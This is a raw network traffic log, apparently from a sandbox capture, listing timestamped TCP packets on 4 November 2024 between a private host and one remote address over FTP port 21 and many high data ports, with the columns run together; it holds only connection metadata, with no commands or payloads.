                                            Nov 4, 2024 10:14:58.969908953 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.969918966 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.969928980 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.969949961 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.969954967 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.969969988 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.969981909 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.970007896 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.970026970 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.970041037 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.970052958 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.970067978 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.970097065 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.970112085 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.970151901 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:58.970199108 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.970248938 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.970259905 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.970297098 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975121975 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975157976 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975244999 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975363970 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975483894 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975492954 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975538969 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975548029 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975589037 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975596905 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.975693941 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.976269007 CET5151250002110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:58.976314068 CET5000251512192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:59.047811031 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:59.047854900 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:14:59.746118069 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:14:59.899815083 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:09.796015024 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:09.801285982 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:10.151797056 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:10.152587891 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:10.157433033 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:10.157993078 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:10.157998085 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:10.162878036 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.051382065 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.056477070 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.056545019 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.089180946 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.089485884 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094521999 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094573975 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094575882 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094614983 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094635963 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094647884 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094661951 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094688892 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094795942 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094811916 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094822884 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094836950 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094841957 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094865084 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094878912 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094897032 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.094945908 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094955921 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.094994068 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.099477053 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.099488020 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.099540949 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.099577904 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.099594116 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.099602938 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.099611998 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.099622011 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.099646091 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.099659920 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.100109100 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.100119114 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.100130081 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.100140095 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.100150108 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.100172997 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.104475975 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.104513884 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.104896069 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.104968071 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.104980946 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.105015993 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.105207920 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.105225086 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.105273962 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.105356932 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.105807066 CET5816150003110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.105854034 CET5000358161192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.196697950 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.887828112 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.957633018 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:11.960347891 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:11.965384960 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:12.087330103 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:13.237684011 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.237834930 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:13.237855911 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.237893105 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:13.238195896 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.238229036 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:13.238683939 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.238719940 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:13.242614031 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.596108913 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.596257925 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:13.601094007 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.933480024 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:13.938083887 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:13.943005085 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:14.275235891 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:14.275672913 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:14.280577898 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:15.378047943 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:15.378062010 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:15.378109932 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:15.378156900 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:15.378196001 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:15.378372908 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:15.383136988 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:15.714868069 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:15.722832918 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:15.727682114 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:15.731568098 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:15.731566906 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:15.736515045 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.156208992 CET5000621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.161232948 CET2150006110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.164210081 CET5000621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.164210081 CET5000621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.170339108 CET2150006110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.176476002 CET5000621192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.665961027 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.666280985 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.671428919 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671439886 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671472073 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671480894 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671492100 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671503067 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671504021 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.671534061 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.671547890 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.671549082 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671561003 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671592951 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671597004 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.671602964 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.671648979 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676435947 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676445007 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676486015 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676506996 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676528931 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676538944 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676564932 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676573992 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676575899 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676601887 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676620960 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676623106 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676652908 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676661968 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676670074 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676695108 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676723957 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.676732063 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676754951 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.676808119 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.681616068 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.681932926 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.682775974 CET6464750005110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:16.684722900 CET5000564647192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:16.712312937 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:17.490400076 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:17.618707895 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:19.968859911 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:19.973927021 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:20.324122906 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:20.326338053 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:20.331502914 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:20.334017992 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:20.334019899 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:20.342175007 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.267529011 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.267780066 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.272780895 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.272806883 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.272825956 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.272835970 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.272845030 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.272877932 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.272891045 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.272917986 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.272927999 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.272967100 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.272979975 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.272991896 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.273003101 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.273041010 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.273041964 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.273088932 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.273206949 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.273256063 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.277687073 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.277719975 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.277755976 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.277771950 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.277796984 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.277848959 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.277863026 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.277913094 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.277983904 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.277996063 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.278049946 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.278085947 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.278196096 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.278207064 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.278217077 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.278304100 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.278310061 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.278388977 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.278444052 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.282545090 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.282613993 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.282679081 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.282763004 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.282852888 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.282953024 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.282963037 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.283010006 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.283134937 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.283171892 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.283212900 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.283222914 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.283536911 CET5849750007110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:21.283584118 CET5000758497192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:21.399821997 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:22.076407909 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:22.197941065 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:27.903599977 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:27.908607960 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:28.259224892 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:28.260075092 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:28.265052080 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:28.265127897 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:28.265204906 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:28.269996881 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.161972046 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.162292957 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167279005 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167289972 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167301893 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167332888 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167363882 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167387009 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167431116 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167440891 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167481899 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167509079 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167520046 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167567968 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167613029 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167624950 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.167663097 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.167663097 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172230005 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172271967 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172283888 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172287941 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172328949 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172353983 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172377110 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172380924 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172401905 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172425985 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.172878027 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.172970057 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.177272081 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.177328110 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.177499056 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.177876949 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.177925110 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178278923 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178324938 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178378105 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.178538084 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.182331085 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.182939053 CET5385250008110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:29.182986975 CET5000853852192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:29.399832964 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:30.841465950 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:30.841900110 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:30.841958046 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:30.842664003 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:30.842757940 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.296973944 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.302050114 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.390192986 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.395140886 CET2150009110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.396219015 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.396219015 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.401485920 CET2150009110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.401623011 CET5000921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.644059896 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.647950888 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.652858019 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:34.654119968 CET5000421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.654119968 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:34.659035921 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.570746899 CET2150004110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.571065903 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.575968981 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576030970 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576420069 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576430082 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576466084 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576469898 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576479912 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576483011 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576518059 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576530933 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576560020 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576570034 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576579094 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576589108 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576600075 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.576610088 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576637983 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.576658964 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.581733942 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.581746101 CET5437850010110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:15:35.581779957 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.581800938 CET5001054378192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:15:35.582283974 CET5437850010110.4.45.197192.168.2.5
